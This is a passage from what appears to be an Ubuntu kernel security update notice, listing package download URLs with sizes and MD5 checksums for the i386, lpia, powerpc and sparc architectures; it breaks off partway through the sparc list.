http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    32458 03e2d90ce28677b7956fa2a72726d02e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    49938 c0d1953d9212f1569f04e8c8ba0db7ca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    42118 db5bcc80727cd1013bc8393df2a88e4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    45954 2d497ad958e7e7fc1b57ce51ff6b3570\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    87386 8e3ab58cf14ac0e97a334a65ae3e42ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    33754 bdbf52c3d681cca0ecdced183d2d37c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   534176 5f166aa72d31a95df7cdb60abe4a0fc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   128172 821c97524ce74e0685b135140c5261d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    49748 9423b0562b984b85856d219d7b67fa27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   295726 0736ef03d01a5e5e4fdf284ad2be5409\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  4185460 831a6068ef18d08ff697df14dead1668\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb\n      Size/MD5:   674832 6c28f2a428900b7c3ecd857dd2363150\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb\n      Size/MD5:   674164 daade678beff67e96da61f42286bb8d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb\n      Size/MD5:   674252 0786c96b6d902a71c6f1a2e5aa202345\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb\n      Size/MD5: 28775482 99e9b99d437aa88ec42e838367ca0c3b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb\n      Size/MD5: 28938194 19d1d147a9e9dfb49fcd30b9d065d289\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb\n      Size/MD5: 28836780 00047de0d649be8b91c813fe7ee482b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb\n      Size/MD5: 11193984 1848c77671f6d9129f990e1a0a9940d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb\n      Size/MD5:   743050 af6030dae8f05d7ef583ee7d6f31be8b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   172774 c11dd36baffeccf283ce48e122d7c791\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   186104 072e07c277b4f37611b21aad4390ccb0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    28372 82c8b14ef6982a48d3a8459d56ede43c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   292792 6c99c3b65ff7b159af94edf70358cb4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  2400232 94729dcb0c5adb15ded7b3302c4005eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   142004 9e43481b4e46409d8e711a628ce5e40a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   189566 83afe6de56cab613b4f890723a82a6b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   148522 b96767af921427e880579659ba7b757a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    35306 a6a1cbe7a75490632f24cad479916315\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:     6842 86b286685eabaf8b6d28d3f922249503\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    86058 c014cfa81ab99a01793d25b995c7d75f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    46424 d525bcf1a39f6a21f09d52d24e6a0eb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:     8916 f9efb7f192c3cc22c14df58803a64dfc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    36282 1d843fa9ef5beed8582f2924d0b53bcc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    21660 3ad0b4572c12885957a3b753fc3b9fe3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  1495010 630f37fe420a74a22b4ca2eba4960999\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    44088 fddf56b0285ec3d0e6fc61e0fe8b86e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    48484 2614a20d6d57892a8789091eeeaa67b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   117810 ff004889bca11286287a59c36fa24c0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    14526 4c9cb3d5598c843bf5b90ddf0292d3c1\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   198810 76156647956f29c9e519aeac038c63bb\n    http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    32452 9a5dd5fe15dda0be28f7afd966e89af9\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    49936 31c4008b50016b2a6c3a90703f2becbb\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    42148 931518b24b123d3749719c35b2b23759\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    45950 297c686f52a35049b3b2c87a96aebf68\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    87366 ec3f16cc0aeeef91b8c887ff347b6b0a\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    33750 a29ddd339c071c5b948c96e30f36f650\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   534366 b15b19f3e6c581d22514700dbd6502d8\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   128202 3d0f559a80187074bb210e3dae3bbfa0\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    49732 41abb7e30f0bdac62c5cd064c4b0ac3e\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   295732 12e912ce1f15d580960e7956de0c4ae0\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  4186814 7c18e86a3f5a5a985488ad67718887f9\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb\n      Size/MD5:   674880 5dd2779cd5be613c330b7dc35410f271\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb\n      Size/MD5: 28831528 8eaab1870eda62e8ee231e429c361455\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb\n      Size/MD5:   742994 99d2d0609d9032e2810e19c92fc92834\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   172836 8b15eb5579853f45dc49055351df4225\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   186092 0eb0ceb5c23748d829f3e1d7977a35be\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    28366 0301ac544cf27b3dce660787d7575804\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   292736 16e84844c99e73b4e00419c38d78db3d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  2400366 43dda8f1a10775e382e7a328381265db\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   141998 930123e6b57798468d7085ae9f549150\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   189564 8d6e18aedb4b970a3643207b96589863\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   148506 78efdbf1323c68be564ad06205842cb6\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    35300 054cf95e7af87d6f744b69eb8166f275\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:     6828 5dbf32d40e88f471614e5cf286670e8f\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    86054 f24e7eaa3608985960e54a9048a24fb6\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    46410 80945eba79f53965effd546d23a8560b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:     8906 e1c6021a615a4363dde2cf4a893fa53b\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    36270 eb2848e19ec2351b9102bc640e546991\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    21660 cfb271e26dfd127871f5d27547e0a7ba\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  1494736 44113d529e3f4d3828f8719facd86370\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    44068 98817942a8188bd9281def20a1d327bb\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    48474 ebc9e58b5f98182006d6e3bb9c5ce179\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   117786 9b864dfc32d19a8cf2d61a68894835e9\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    14524 9ad51e3871197eb84b193bd9a3b29ec2\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   321488 509ad8549565d0d87fe246df5b26c7af\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   263628 b7028cc16ec749cc2fdd86e985c7bc6a\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    58850 3e2f18df29a75debc326e5919c9c13da\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    67040 8fdde64943d01e5c6a372424d3d24a03\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    45914 6a21bb6fc6dce2767be6f974ffdab524\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    51296 4c928d4f04bf96f5cdc5ccf7d3a60c81\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    90684 eac2ea55da023924723593afffbb5d2c\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   105146 c407a156a5e56f284fa682d87d2ed50e\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    39492 38f377d5a0bdbbbb642545aa6d7f641c\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    39270 47f890e2a1418595d92858350aa16475\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   580998 825045ff82a442eaf1a21a5448b0cefb\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   626388 b56b5416b642ba57471e6e125b99a32f\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   149292 930001a305b0f78060f3472fe46cde00\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   147332 ef6994c30f19462a7fc0cb7cd8f4dacc\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    79750 75c6da2308e05334f89f62917aee5b3d\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    84136 caf2a7e924b03340e579e9bdc0a7ba50\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   402954 9fc3d4860f5c32aff3ac252379938fef\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   342516 5737df8ea2adfc45ecae9d322931187a\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  3813204 3ac91a51b3525bfbb0f6166fc140d7db\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  5193132 54dce7348221bcc93bbc01512d553a16\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5:   784762 523b94315bff20137df79c5308abd5b7\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5:   801042 2a8e55b23ad4dc09ee3cbb2fdc23cc28\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb\n      Size/MD5:   783708 185ba99656f4fa37874e0241e9f25dbb\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5: 24820746 adc5365726ba88565ad89953707bd012\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5: 25829918 fc82da730c6d730c5a4ac87d30594749\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb\n      Size/MD5: 24656226 7791f88107e97c5419f0e2d2f850c38e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb\n      Size/MD5:   728146 1dabe36864839475aab9293825cfc3e4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   271924 8fb200d91f158f9b0eb209df5a5ffcd4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   294610 317f7d34e3cd0ac823fcc5d48bcc9a7f\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   210546 041508a9555e18e2b8b4cab41b26f397\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   216984 845e2e452ef869aa3b39ea47bfa0280b\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    25798 19a7cae7e4f693c269f54dc0f2762f33\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    28984 419926b33e2b573f8d3ccaa5ade657f1\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   314922 83dcb63807ffb50682219b20333c23bc\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   357524 a32753bfca44b1afb9b11f72b25ebb9e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  2027754 9b45ff8446ec0bad5befec2dc3ecdb72\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  2247744 35d212f7569bb03564a7f0294879557f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   213544 3fb9afb7247290ffb3508744ab6cbb9f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   209776 e42b20eb402cb2a55fea2a80f5cef162\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   210242 78939115c860efacb83481c0687f1a7a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   244856 8fcff5fb05c0921681ec2bb44637c624\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   111834 a6b65e618a3240d51f36f37911d1d7cc\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   131610 dc5625deacbac446e71517f5902376b1\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    49028 ac60e4bf193e7725de6d8999c6231915\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    44082 531b2cbe15ec2f62fe61bd7002b1df02\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     5852 f049a9332d469b247e451868b4f22cce\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     6504 32fb4de3cd714598281c2d4d5d2ee6d6\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    79118 e98cffbfe6f6cbffcfa6dce199dc6c46\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    85190 e648dc2d3e124d68c47d4ec18836097f\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    74318 19b737ad1f43e7be1c6cc7e211085424\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    27228 0b5b4529d140289e616bded832055cbc\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     8538 9010c080bd63660bf529930565d49f62\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     9818 e909c37d26354ddbdceddc72628d71b3\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    58830 ae6573a0664b5486360156dd6711776c\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    70140 83085dfd5f4bb24ab67dd967e6b609cc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    23714 86a598e1b13e4d6963475732e7a1097a\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    30804 b382bc0bfffd61156d0f8b3dc90bd307\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  1556894 ea2800c85a0115ad2e524a8b4ab4cb91\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  1509110 e42499f8bdbad020301a11617f6b65a8\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    81698 095ff78875bae0b90edd07ac3b51993d\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    88530 1a36ce88a0c6f7b495c869da15bf9d69\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    64400 8ff9a2aef998409440c1139f3db8c7ee\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    76990 392faa17f8c688e3856d91fb657eba09\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   141540 636e6d1827591a3aa46b82d7dc0b8ab6\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   151356 0f39f4d13770ceab049be6fb9c83fc16\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   139430 14f825a3334b18614059312527002767\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    70106 6dde178febff58a546142209374e1616\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    46510 64b0be995ce3d697a84cd3b0665ffe68\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    93974 28048300aba15f2a3937723bc0afc5cd\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   588788 c17e7feb3442296b7ed93c92cb988625\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   148426 6f429deb9df760daf28c04ad93ea6758\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    75862 6f382de52d9e1b52611c70a703895e5d\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  2892370 ec9440bb8ee05a7ac071992c5711139f\n    